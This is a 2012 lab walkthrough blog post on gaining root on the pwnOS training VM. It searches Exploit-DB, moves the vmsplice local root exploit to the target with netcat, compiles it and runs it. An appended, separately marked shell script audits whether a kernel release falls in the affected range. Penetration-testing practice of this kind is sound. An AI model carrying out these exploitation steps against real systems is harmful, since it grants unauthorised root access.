Friday 14 September 2012

Gaining Access PwnOS

Posted at 17:29
Previously we discussed privilege escalation.
Now we will learn how to gain access on pwnOS.

  1. Check the kernel version of pwnOS
    vmware@ubuntuvm$ uname -a
  2. Search Exploit-DB for an exploit for Linux kernel 2.6.22
    cd /pentest/exploits/exploitdb/
    ./searchsploit kernel linux
    Linux Kernel <=2.6.21.1 IPv6 Jumbo Bug Remote DoS Exploit                   /linux/dos/4893.c
    Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC       /windows/dos/4911.c
    Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit         /windows/local/5004.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    DESlock+ <= 3.2.6 (list) Local Kernel Memory Leak PoC                       /windows/local/5141.c
  3. Send the exploit to pwnOS using netcat
    root@bt# nc 192.168.56.101 1011 < /pentest/exploits/exploitdb/platform/linux/local/5092.c
  4. Run netcat on pwnOS to receive the exploit
    vmware@ubuntuvm$ nc -l -p 1011 > 5092.c
  5. Compile the exploit using GCC
    vmware@ubuntuvm$ gcc 5092.c -o exploit
  6. Run the exploit, then run this command to check the access level
    vmware@ubuntuvm$ ./exploit
    whoami
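
Steps 1 and 2 amount to matching the `uname` release against the version range in an exploit title. The same match is useful as a host audit, shown here as an added example that is not part of the original post; the function names and the sample release strings are assumptions made for illustration, and the range is the one printed for 5092.c above.

```shell
#!/bin/sh
# Added example: flag kernel releases that fall inside the range printed in
# the searchsploit title for 5092.c (2.6.17 - 2.6.24.1). A match means
# "check the vendor changelog", not "vulnerable": distribution kernels
# backport fixes without changing the upstream version number.

VMSPLICE_LO=2.6.17
VMSPLICE_HI=2.6.24.1

# kver_in_range RELEASE LOW HIGH
# Exit status: 0 = inside [LOW, HIGH], 1 = outside, 2 = unparseable release.
kver_in_range() {
    awk -v rel="$1" -v lo="$2" -v hi="$3" '
    function cmp(x, y,   a, b, i) {       # numeric compare of dotted fields
        split(x, a, "."); split(y, b, ".")
        for (i = 1; i <= 4; i++) {        # missing fields count as 0
            if (a[i] + 0 < b[i] + 0) return -1
            if (a[i] + 0 > b[i] + 0) return 1
        }
        return 0
    }
    BEGIN {
        sub(/[^0-9.].*$/, "", rel)        # drop a suffix such as "-14-server"
        if (rel !~ /^[0-9]+\.[0-9]+(\.[0-9]+)*$/) exit 2
        exit !(cmp(rel, lo) >= 0 && cmp(rel, hi) <= 0)
    }'
}

# Hypothetical reporting helper built on the check above.
check_kernel() {
    rc=0
    kver_in_range "$1" "$VMSPLICE_LO" "$VMSPLICE_HI" || rc=$?
    case $rc in
        0) echo "$1: inside $VMSPLICE_LO - $VMSPLICE_HI, confirm the vendor fix is installed" ;;
        1) echo "$1: outside the listed range" ;;
        *) echo "$1: could not parse kernel release" ;;
    esac
}

# Constructed sample releases, followed by the local host's own release.
for rel in "2.6.22-14-server" "2.6.24.1" "2.6.25" "2.6.9" "$(uname -r)"; do
    check_kernel "$rel"
done
```

The fields are compared numerically, so 2.6.9 sorts below 2.6.17 instead of above it as a plain string comparison would.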
